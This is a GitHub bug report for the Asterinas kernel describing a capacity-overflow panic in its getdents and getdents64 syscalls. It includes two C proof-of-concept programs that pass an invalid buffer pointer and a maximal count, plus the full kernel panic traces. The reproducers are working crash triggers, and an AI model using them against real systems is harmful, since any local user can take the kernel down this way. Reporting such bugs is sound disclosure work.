asterinas
asterinas copied to clipboard
asterinas
Capacity overflow in `sys_getdents()`
Describe the bug
There is a capacity overflow in sys_getdents() at kernel/src/syscall/getdents64.rs:36 when call sys_getdents with large buf_len.
https://github.com/asterinas/asterinas/blob/f01772ca853e76d3076a561da3281034e3a46196/kernel/src/syscall/getdents64.rs#L36
To Reproduce
- Compile a program which calls
sys_getdents:
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
int main() {
int fd = open("/proc", O_RDONLY);
char *buffer = (char *)0x4;
size_t count = 0xffffffffffffffff;
long result = syscall(SYS_getdents, fd, buffer, count);
perror("getdents");
return 0;
}
- Run the compiled program in Asterinas.
Expected behavior
Asterinas reports capacity overflow and is terminated.
Environment
- Official docker asterinas/asterinas:0.8.1
- 11th Gen Intel(R) Core(TM) i7-1165G7 @ 2.80GHz
- Asterinas version: main 8bfbdf6
Logs
~ # /root/getdents.c
panicked at /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/raw_vec.rs:25:5:
capacity overflow
Printing stack trace:
1: fn 0xffffffff887e5490 - pc 0xffffffff887e54fa / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a9296c0;
2: fn 0xffffffff887e52a0 - pc 0xffffffff887e53f0 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929720;
3: fn 0xffffffff88049000 - pc 0xffffffff8804900a / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929870;
4: fn 0xffffffff889c2af0 - pc 0xffffffff889c2b72 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929880;
5: fn 0xffffffff88987fe0 - pc 0xffffffff88988009 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929910;
6: fn 0xffffffff88989710 - pc 0xffffffff8898974e / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929950;
7: fn 0xffffffff8874d1b0 - pc 0xffffffff8874d20f / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929990;
8: fn 0xffffffff88742380 - pc 0xffffffff887423b4 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a9299f0;
9: fn 0xffffffff88749e10 - pc 0xffffffff88749e2f / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929a90;
10: fn 0xffffffff885af2a0 - pc 0xffffffff885af899 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929ab0;
11: fn 0xffffffff884ac9d0 - pc 0xffffffff884c30aa / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a929f30;
12: fn 0xffffffff884ac1b0 - pc 0xffffffff884ac23e / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a9403d0;
13: fn 0xffffffff884a15f0 - pc 0xffffffff884a216f / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a940570;
14: fn 0xffffffff883a06f0 - pc 0xffffffff883a06fe / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a940f90;
15: fn 0xffffffff88857ed0 - pc 0xffffffff88857ee6 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a940fb0;
16: fn 0xffffffff88832c80 - pc 0xffffffff88832ce9 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a940fd0;
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883b687; rbp 0x0; rsp 0xffff80000a941000;
[OSDK] The kernel seems panicked. Parsing stack trace for source lines:
( 1) /root/asterinas/ostd/src/panicking.rs:113
( 2) /root/asterinas/ostd/src/panicking.rs:59
( 3) 73ctk84we8vz1kw7hv2sr00er:?
( 4) ??:?
( 5) alloc.4436a8b0cd505e33-cgu.0:?
( 6) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/raw_vec.rs:594
( 7) ??:?
( 8) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/vec/spec_from_elem.rs:52
( 9) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/vec/mod.rs:2737
( 10) /root/asterinas/kernel/src/syscall/getdents64.rs:36
( 11) /root/asterinas/kernel/src/syscall/mod.rs:171
( 12) /root/asterinas/kernel/src/syscall/mod.rs:328
( 13) /root/asterinas/kernel/src/thread/task.rs:69
( 14) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/ops/function.rs:79
( 15) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/boxed.rs:2077
( 16) /root/asterinas/ostd/src/task/mod.rs:175
And a similar bug in sys_getdents64(), which could be triggered by
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
int main() {
int fd = open("/proc", O_RDONLY);
char *buffer = (char *)0x4;
size_t count = 0xffffffffffffffff;
long result = syscall(SYS_getdents64, fd, buffer, count);
perror("getdents");
return 0;
}
And the crash log is:
~ # ./getdents64.c
panicked at /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/raw_vec.rs:25:5:
capacity overflow
Printing stack trace:
1: fn 0xffffffff887e5b50 - pc 0xffffffff887e5bba / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa296c0;
2: fn 0xffffffff887e5960 - pc 0xffffffff887e5ab0 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29720;
3: fn 0xffffffff88049000 - pc 0xffffffff8804900a / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29870;
4: fn 0xffffffff889c31b0 - pc 0xffffffff889c3232 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29880;
5: fn 0xffffffff889886a0 - pc 0xffffffff889886c9 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29910;
6: fn 0xffffffff88989dd0 - pc 0xffffffff88989e0e / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29950;
7: fn 0xffffffff8874d870 - pc 0xffffffff8874d8cf / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29990;
8: fn 0xffffffff88742a40 - pc 0xffffffff88742a74 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa299f0;
9: fn 0xffffffff8874a4d0 - pc 0xffffffff8874a4ef / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29a90;
10: fn 0xffffffff885b0360 - pc 0xffffffff885b0959 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29ab0;
11: fn 0xffffffff884ad090 - pc 0xffffffff884d68e8 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa29f30;
12: fn 0xffffffff884ac870 - pc 0xffffffff884ac8fe / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa403d0;
13: fn 0xffffffff884a1cb0 - pc 0xffffffff884a282f / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa40570;
14: fn 0xffffffff883a06f0 - pc 0xffffffff883a06fe / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa40f90;
15: fn 0xffffffff88858590 - pc 0xffffffff888585a6 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa40fb0;
16: fn 0xffffffff88833340 - pc 0xffffffff888333a9 / registers:
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa40fd0;
rax 0x1; rdx 0x8; rcx 0x0; rbx 0x0;
rsi 0x1; rdi 0xffffffff8883bd47; rbp 0x0; rsp 0xffff80000aa41000;
[OSDK] The kernel seems panicked. Parsing stack trace for source lines:
( 1) /root/asterinas/ostd/src/panicking.rs:113
( 2) /root/asterinas/ostd/src/panicking.rs:59
( 3) 73ctk84we8vz1kw7hv2sr00er:?
( 4) ??:?
( 5) alloc.4436a8b0cd505e33-cgu.0:?
( 6) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/raw_vec.rs:594
( 7) ??:?
( 8) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/vec/spec_from_elem.rs:52
( 9) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/vec/mod.rs:2737
( 10) /root/asterinas/kernel/src/syscall/getdents64.rs:66
( 11) /root/asterinas/kernel/src/syscall/mod.rs:171
( 12) /root/asterinas/kernel/src/syscall/mod.rs:328
( 13) /root/asterinas/kernel/src/thread/task.rs:69
( 14) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core/src/ops/function.rs:79
( 15) /root/.rustup/toolchains/nightly-2024-06-20-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/alloc/src/boxed.rs:2077
( 16) /root/asterinas/ostd/src/task/mod.rs:175
make: *** [Makefile:172: run] Error 1